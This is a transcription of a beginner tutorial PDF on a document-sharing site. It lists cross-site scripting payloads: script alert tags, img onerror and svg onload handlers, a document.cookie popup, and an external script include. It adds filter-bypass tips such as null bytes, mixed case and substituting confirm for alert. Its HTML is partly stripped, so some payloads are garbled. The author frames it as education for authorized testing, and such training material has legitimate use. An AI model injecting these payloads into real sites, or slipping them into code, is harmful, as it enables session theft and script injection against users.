Cross-Site Scripting (XSS) Payload Examples
2y ago
40 Views
1 Downloads
229.73 KB
7 Pages
Report/dmca
Download PDF

Transcription

Cross-Site Scripting (XSS) Payload ExamplesThis is not meant to be an exhaustive list of XSS examples. I’m not going to explain the differencebetween the various types of XSS attacks, because that’s already been done. I’m merely showing yousome basic payloads and how they work. I’m not going to try to explain the theory behind these attacks,either. I’ll add to this list as I explore more and different types of payloads.Do not attempt these or any other attacks on any site or application that you do not have explicitpermission to test. This guide was created for educational purposes only. The author assumes noresponsibility for your actions.Feel free to share this information. These attacks are not my original creations. I am merely presentingthis information in a manner that may help beginners see how specific payloads function.Please let me know if you find errors in this or any of my other tutorials. You can contact me on Twitter.More XSS Payloads: Ultimate Cross Site Scripting Attack Cheat Sheet: ts/531.txt More XSS Payloads: XSS%20-2 XSS-Payload-List: https://github.com/payloadbox/xss-payload-list Portswigger XSS Cheat Sheet: ripting/cheat-sheetThis tutorial was created by @deepeddyinfosec.www.deepeddyinfosec.comUpdated 10/25/2020

Payload Notes and Tips These payloads entered in search fields may also be attempted in URLs.Example: http://10.0.0.21/dvwa/vulnerabilities/xss r/?name svg/onload alert(1) Some payloads may leave residual characters, such as “ on the page after a search. You may beable to escape those characters using encoding. Other payloads may leave broken images. They may also be attached to images that cause popup onmouseover or by clicking them. In some cases, a null byte, %00, in front of the payload may need to be used in order to bypassfilters. When copying and pasting from MS Word, you may need to manually replace single and doublequote characters. Sometimes, they do not work because of MS Word formatting. Try these payloads with both double and single quotes. If one doesn’t work, try the other. If your payloads still don’t work, try using the word confirm instead of alert. The word alert may befiltered out. Thanks to The XSS Rat for that one!This tutorial was created by @deepeddyinfosec.www.deepeddyinfosec.comUpdated 10/25/2020

Example 1 – XXS PopupPayloadsOutput script alert("XSS"); /script script alert(‘XSS’); /script script alert(‘XSS’) /script script alert("XSS");// /script sCripT alert("XSS") /scRipt scr script ipt alert('XSS') /script sCripT alert('XSS') /scRipt img src "/" onerror "alert('XSS')"/ img src x onMouseOver alert('XSS') svg/onload eval("ale" "rt")( XSS {alert XSS } ) img src 'nevermind' onerror "alert('XSS');" / script alert("XSS");// / script svg/onload alert('XSS') div.innerHTML ' script deferred alert("XSS"); /script '; img src "aaa" onerror alert('xxs') body onload "alert('XSS')" This tutorial was created by @deepeddyinfosec.www.deepeddyinfosec.comUpdated 10/25/2020

Example 2 – 1 PopupPayloadsOutput svg/onload alert(1) svg onload alert(1) /tag svg onload alert(1) " /tag svg onload alert(1) /script svg onload alert(1) “ img onerror alert(1) src img src 'x' onerror 'alert(1)' " svg onload alert(1) script alert(1) /script %00 script alert(1) /script %00 script alert(1); /script This tutorial was created by @deepeddyinfosec.www.deepeddyinfosec.comUpdated 10/25/2020

Example 3 – Cookie PopupPayloadOutput script alert(document.cookie); /script This tutorial was created by @deepeddyinfosec.www.deepeddyinfosec.comUpdated 10/25/2020

Example 4 – Domain PopupPayloadsOutput /Textarea/ /Noscript/ /Pre/ /Xmp Svg/Onload confirm(document.domain) ” script/src //15.rs /script script src //⑮. /script ** Use this script when the input field is limited. Thanks to TR Bug Hunters for that one.This tutorial was created by @deepeddyinfosec.www.deepeddyinfosec.comUpdated 10/25/2020

Example 5 – Blank nerHTML " img srconerror alert() "This tutorial was created by @deepeddyinfosec.www.deepeddyinfosec.comUpdated 10/25/2020

This tutorial was created by @deepeddyinfosec. www.deepeddyinfosec.com Updated 10/25/2020 Cross-Site Scripting (XSS) Payload Examples This is not meant to be an exhaustive list of XSS examples. I’m not going to explain the difference between the various types of XSS attacks,

Related Books

Introduction to scripting with Unity - Ohio State University

Introduction to scripting with Unity - Ohio State University

Electron Security Checklist - Doyensec

Electron Security Checklist - Doyensec

Scripting in Unity3D (vers. 4.2) - Purdue University

Scripting in Unity3D (vers. 4.2) - Purdue University

The King Air 350 - Beechcraft

The King Air 350 - Beechcraft

Cyber Security - TCET

Cyber Security - TCET

CONTEXT ,SITE ANALYSIS AND DESIGN - bmcc.nsw.gov.au

CONTEXT ,SITE ANALYSIS AND DESIGN - bmcc.nsw.gov.au

Using Drobo for On-site and Off-site Backup with CrashPlan

Using Drobo for On-site and Off-site Backup with CrashPlan

Analysing Cross-Currency Basis Spreads

Analysing Cross-Currency Basis Spreads

Licensed Training Provider - American Red Cross

Licensed Training Provider - American Red Cross

Catalogue of Youth Disaster Preparedness Education

Catalogue of Youth Disaster Preparedness Education

AMERICAN RED CROSS

AMERICAN RED CROSS

PopularTags

Recent Views